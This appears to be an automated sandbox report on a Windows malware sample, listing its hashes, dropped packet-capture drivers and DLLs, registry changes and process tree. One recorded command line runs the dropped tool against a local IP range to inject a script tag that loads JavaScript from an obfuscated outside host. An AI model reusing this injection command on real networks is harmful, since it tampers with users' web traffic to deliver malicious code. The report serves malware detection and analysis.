Analysis
-
max time kernel
146s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
26/12/2023, 09:03
Static task
static1
Behavioral task
behavioral1
Sample
6216999ae03e9bc94f4f910918a3d550.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6216999ae03e9bc94f4f910918a3d550.exe
Resource
win10v2004-20231215-en
General
-
Target
6216999ae03e9bc94f4f910918a3d550.exe
-
Size
177KB
-
MD5
6216999ae03e9bc94f4f910918a3d550
-
SHA1
ac9e37b3422fa4c6c34725e8314e04c91a185f81
-
SHA256
410aae7b289f477ef338588a1cf9f234a6a58cdfe59bb75bc6417d21e305f056
-
SHA512
87dcf16c6cef0cd60a5a8655694c472fa3b55533de167ccd29f5840c6138c9b840b03669f043a14bcf4d68ef182a7287ce3004bcdeba252853817aa427da0c69
-
SSDEEP
3072:Q1r61/kTgwCiCAeHwSocr8FrAlFs13G5hDO9HTyIFZWRk1nC0Hunbrd/AoutD:ur3bCiReQS/QrAlFsaDOFT5ZWRkBun/C
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 6216999ae03e9bc94f4f910918a3d550.exe -
Executes dropped EXE 1 IoCs
pid Process 2440 360uatn.exe -
Loads dropped DLL 5 IoCs
pid Process 2440 360uatn.exe 2440 360uatn.exe 2440 360uatn.exe 2440 360uatn.exe 2440 360uatn.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll 6216999ae03e9bc94f4f910918a3d550.exe File created C:\Windows\SysWOW64\WanPacket.dll 6216999ae03e9bc94f4f910918a3d550.exe File created C:\Windows\SysWOW64\wpcap.dll 6216999ae03e9bc94f4f910918a3d550.exe File created C:\Windows\SysWOW64\360uatn.exe 6216999ae03e9bc94f4f910918a3d550.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings 6216999ae03e9bc94f4f910918a3d550.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1324 PING.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1352 wrote to memory of 2440 1352 6216999ae03e9bc94f4f910918a3d550.exe 99 PID 1352 wrote to memory of 2440 1352 6216999ae03e9bc94f4f910918a3d550.exe 99 PID 1352 wrote to memory of 2440 1352 6216999ae03e9bc94f4f910918a3d550.exe 99 PID 1352 wrote to memory of 2492 1352 6216999ae03e9bc94f4f910918a3d550.exe 102 PID 1352 wrote to memory of 2492 1352 6216999ae03e9bc94f4f910918a3d550.exe 102 PID 1352 wrote to memory of 2492 1352 6216999ae03e9bc94f4f910918a3d550.exe 102 PID 2492 wrote to memory of 1324 2492 cmd.exe 103 PID 2492 wrote to memory of 1324 2492 cmd.exe 103 PID 2492 wrote to memory of 1324 2492 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe"C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\360uatn.exe-idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%61b.P%61ss%69ngG%61s.n%65t/tj.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 12.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1324
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2224
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
93KB
MD55a135b608253c6040337d3311554e477
SHA1aca6bfe72f762b2dc9ca3f36f2fec7aa1cea1dcc
SHA256350328a72ad0cdb1c5afe54b1084586b81ce4e194e826ed27d4eb1f5f913c94c
SHA51205ce32a24646134e3842df833506fac87b0ed747fef7f8c3d39b2c922535f611d1c372cb7dee5bc5c1abd238b95837bc408f2e8eaf84375d7c2a0146ac627aee
-
Filesize
1.2MB
MD5d39c94af221e3afd8b5a46c5beb3b778
SHA1aac46699e72d26a508894c4ce8a06f2cbbd10709
SHA256cf14ad680289728f0d87a29a074b294599bb132d562c666bab1a283974727e09
SHA5128902bb9d884930e46a700b9124c72001376e3efbb7214455c525a1e4271a95b2756fbbdbc7d2f7793744b8fd2d8ddc070732e43b2ad4eef091a433bfd38077ca
-
Filesize
92KB
MD54d892fa0a54e6bfdd4f4864775c1c51b
SHA1a710131f8c2653c1556cfb1d078644c3f18951a7
SHA2567670804e27240f191cd77b6576b187f0bee54edb393044c11c63d39ca727c8f0
SHA5121c3e61875272ff3ca8132334cd4069c466e47e47a48ac3f3f98d503501a88ef457b730ee65656b367ac36c8947ce616fc337e29f07c1cf9a175448c793cdd813